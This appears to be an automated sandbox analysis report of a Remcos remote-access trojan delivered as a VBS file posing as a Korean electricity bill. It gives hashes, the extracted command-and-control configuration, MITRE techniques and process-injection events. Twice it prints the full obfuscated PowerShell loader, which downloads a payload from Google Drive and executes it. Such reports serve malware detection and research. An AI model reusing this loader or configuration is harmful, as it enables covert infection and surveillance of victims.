remcos | 23c6d3dfe0d9fe47d427515c8cf90e9752bfe83930af39b7978c17512ad53209

General

Target

2024 년 9 월분 전기세 청구서·pdf.vbs
Size

74KB
MD5

cd9505a0c492be1e52f012f624835147
SHA1

bece8abdda5efe16102c4c04d66cb1ab644b0046
SHA256

9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0
SHA512

b0ab14293923b2ca6a06a0c198b42c8f18d463a2e374e230d6a7f9c13afa49cf4c0c9c87b2c4a9687eb5f6ddf2b7644a1f500cf4077148aaa21a3f23effb00be
SSDEEP

1536:sHyobezwnrkAkPh3JXNP3kK8A+NtZD8A/KtMNVAf:sHyMCAqhtKNtd8bf

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 9 IoCs

flow	pid	Process
5	580	powershell.exe
7	580	powershell.exe
9	2960	msiexec.exe
11	2960	msiexec.exe
13	2960	msiexec.exe
15	2960	msiexec.exe
16	2960	msiexec.exe
18	2960	msiexec.exe
20	2960	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
580	powershell.exe
2716	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
4	drive.google.com
5	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2960	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2716	powershell.exe
2960	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2716 set thread context of 2960	2716	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
580	powershell.exe
2716	powershell.exe
2716	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	580	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2960	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 580	2440	WScript.exe	29
PID 2440 wrote to memory of 580	2440	WScript.exe	29
PID 2440 wrote to memory of 580	2440	WScript.exe	29
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34
PID 2716 wrote to memory of 2960	2716	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2024 년 9 월분 전기세 청구서·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtCo ym.superSVirile.nemocTyngdusem nrEfteriUsmidtArneryTilliPApinarUpperoumpirt Shmuo OutfcHjrneo C.lilPasseTergatyUnsulp Pre e Mori]Sorre:Sac,h:Ma diTStormlRengrsSeert1Novem2Pre n ');$Ornaterne=$Produktionssystem[0];$Repertoirer248=(Shouse ' Sp e$KultugDist lSlageoBorepb.evanAlucenLR kla: BasuTNonphITransl SolsTIri,iv IndaIHovednGalatG RejseFossel Wisss MarceGuaryS Fred=MyeloNStaale E,skwRatio-Opvi oAbs lbfor,yjUdaa,e iljicStumpTAste, MinirS Scu YBoar S PlestPeriveKolonM Parl. CellN achE Ii lt Udb . ShraWF.rurEDeploBOpstiCBe.neLoutmaiOm,rseNikkeNBlindT Tilb ');Lnder ($Repertoirer248);Lnder (Shouse 'Elseb$ KoepTPru siAnnivlAwin,tSupervLandii OvovnSuspeg Retue oundlInsw sSt aneInfras.edin.GrandHOpt geFemina nfod SteieOutc rlcdfrsUtopi[Ba.wi$SelekDSalindLimnosInt rfDeta j ArileHazinnlapardAntite A th]Kikse= impu$Ind,oNAutomy D.ochKartoeFum ldPanhee anken finnsBaul ');$Undskyldeligstes=Shouse 'S ill$RepubT ultai gal lFolintKlappvTidssiAerofn Cs.rg IndueTr.erlPlurisDokt eVkstcsLeaka.Esp uD glyco ResswStandnUrohelSoegeoSkr,ta VessdNito.F afb,iMamm lTroskeMortg( hrom$BeskrOwh,llr Blinn.bstraUntratRidine Sm kr RussnP,raseUmaad, Bleg$BackbIGinninT.nnivStubmeAndorc Slvetbremsi.krtovG anti SkatsTriggtBioph)flera ';$Invectivist=$Unseasonable;Lnder (Shouse 'Seede$ ConfGfor,ilSovevoSljedBSbeskA onlalBestv:Nige cs.henHUghteUUten rLesskrProg =Playg(Strgnt An se Dives eaphtThurt-Kvot.pObstiAM,trotRostrhDjebe .aes$Lu eriSynknn J levKalkuEKejseC.nameTMuleniStemmvAnhimiPlainsDdsofTprocu)Endoc ');while (!$Churr) {Lnder (Shouse 'Foran$Fjan.gMaschl orsioC ntrbStt eaUvi el.ontu: ejslGAnerkaAttatm caphe.llocnPragtsSlvho=Trump$ReklatS.ripr Ep iuBurgle Meta ') ;Lnder $Undskyldeligstes;Lnder (Shouse 'Smd nSDiesetAlmueaFortrrPen atBeskf-Rs wsS Jordl Tante Fabre Unprp Avan Slimi4Conqu ');Lnder (Shouse ' Best$estrag SlvslSam io RefobArvemaA.onilHomog:djagoCSpa.shp epeuPolitrIsep,rS eri=Enlar( confTAne reAdfrdsimdektVandr- AdvaPLigesamemb tPrepehN tar If,di$PettiI Overn AutovDefoleTospac,essitM treiumrkevTjre.iAprops Billt,mbro)Disco ') ;Lnder (Shouse ' Glov$Urbang ortilnonveoGrimlb,aggaaPortulSpise:G ninIAntiln A cisP.romeVestvc LavpuExactrCorroiBillatUnd rySlart=u,cov$FiltrgSpreelAabeno,ratcb Ar iaGlistlOmst.:UnproLThorviAsylusOvalitLeu,oehertufEfterrXeropiO elunTan sg.fter+Bjlke+Laser% Nenn$Rok rPluxatrHeadlobademdImpreu LestkDa lit Tempi laahodrilln Ap rsMistrsRidseyKeisasguzemtDes.aeContrmPlate.Ma necSttteoCombuuGrisenphonotSucce ') ;$Ornaterne=$Produktionssystem[$Insecurity];}$Genistreger7=322791;$Iceboatsssalat=31553;Lnder (Shouse 'Harpe$ KnetgSecunl F,ero FyrbbPhantaMyosulFornr:HaandN MitueSpanddKrum fbestrlHai,md Er meSkurpl,ussiiBundfgUnsty7 Pont2,hikk Hoved=Tec n IntrGErkeneB.ndotSejer-,taffCBv,ruo SprrnTopv t Pharetekn nFe eltHemit Jrpek$ kneIDemagnS egevAntepePleoncForfotNabofi Ung.vCh fii ConssSe artZo,st ');Lnder (Shouse 'Appet$Tv ngg hakilSymasoAcierbMoralaparbalTopog:Rej rI Kordn pfiedClipprOuthiiKkkenmRivie Hj a=sympt Suged[Eft,rSPaasmyKolk.sUnplotC.rpoeAdinamTrack. F emCDauntoheretnPusilv ,deneTestir basst N nm] R ad: uppl:KakaoFTedesrLinchoPhonomElimiB ragia arcisKonsoe.chro6Toldb4Skam SKbsvatMystirKvadriTndstn AbsogPlaty(Telev$ Cyc,NSemiceUnderddriftf SvmmlBrevfdGym,ieTresil Rou iKeglegFrygt7C iro2Uropf) Z og ');Lnder (Shouse 'De re$Boobrg ettylVdenvoGoffeb R ina RevolNo,co:Wlec.APole nBringk Trree AmmorEnep pGrothlHuggpaSquasdPatrosLondreRekylrSnekan IsseeBodsv1Lip m1 dekr0Bundl psig=Kart, Ush k[PlicaSLjtnay Da ks TruttSolice veramSlat,. D.miT TimeeStu dxForsutSkral.a idnEUpernnWallpc Sammo Qui.dStyrii Pr.snhidegga.els]Genbr: Whim:JamaiAUn giSElm sCUdfreIInd.jIZambo.ReproGSysteeAmatrt CiviS Eg ltCyanirProgriBurmanVaticgDu li(Bevis$OrdinI dsaanN nepdQuindrSo,asiSte lmUnwre)Reins ');Lnder (Shouse 'H.ali$subvegdobbel.ereaoUnde,bH ppeaSkr mlSubwa: CervRMiljsiPi cogL,ngeh,ndlet SekslPlurae KartsLaundsTitmanEk poepsyc.sBagnesT,kke= S lv$Symp,ARatton AfmakCarnie vaudrOmgivpSelvmlQ aubaP rlodAftrksVauxheM sunrstenonAnth eB tte1Rytte1 ulti0Cadav. Sk.asOsteouLovlibSamkrs ountUnderrCentri StilnTitulgUtopi(Skjer$ OrdeGopspaeW,ltonRugekiMiliesp ocetExcerrRounjeNoningcun ie ConvrTands7somal,Fast $AbdicI,rovrc I daeVenosbSto moGaeldaKi hbtSta ksVaages Erass Couna udhul G,ltaInvectSamme)Corkb ');Lnder $Rightlessness;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
afbaf943a6884bc90202ba3137424cd3

SHA1
da021e768efb60e0f7744aea4b57e297c9440300

SHA256
2176170a60c973e6b52b9a833a3a31574a502793a0683c3f7a1dd0280ecdad62

SHA512
23c098f7ae0a1363020719bb1aa9b5f1c432b54f8fcadcb399a3cefc9b97d7e2a44a93d87816a49468ae624e819656244e836441d4766dfaffb19f9032d8f09b

Download Submit
C:\Users\Admin\AppData\Roaming\Maskes.lea

Filesize
461KB

MD5
ea499ea38a8e086008ff343b628809f6

SHA1
707ab355e7078bff7c196da77f4a5ff0c0ea2362

SHA256
b7a4595b962eaad033c02208443579a198a21fb2b97b0877a40f344debf840ac

SHA512
6dc431504913a8533d11bad6da2b4ee70879515c3ecd2ef42f2231b83c317018edf49d07c1bf154547ae42152ba016a3ef5a3a954288f6736450ed378d0eaa65

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8MYLSBDMW2VX646SMT28.temp

Filesize
7KB

MD5
99ce7b7c2656e54089d3188f47378b54

SHA1
563982e65b1e859e8031b1faadd932b3dfcffaad

SHA256
73aab79739967ba53bca77ba61b1eaf4d5ccc4b25dff4e7f1bf779eb78779414

SHA512
d5ac36db925c0ab3a8fd9dc28cf14f4b0fc911f6871079503db1004ee3b5d66f0f3073e88a83884ec39c017065920dbcb1f2175e4e98e80352a80008e9d6d58f

Download Submit
memory/580-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/580-16-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/580-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/580-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/580-11-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/580-13-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/580-14-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

Filesize
4KB

Download
memory/580-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

Filesize
4KB

Download
memory/580-7-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/580-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/580-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2716-20-0x0000000006560000-0x000000000871A000-memory.dmp

Filesize
33.7MB

Download
memory/2960-21-0x0000000000200000-0x0000000001262000-memory.dmp

Filesize
16.4MB

Download
memory/2960-43-0x0000000000200000-0x0000000001262000-memory.dmp

Filesize
16.4MB

Download

Analysis

Sharing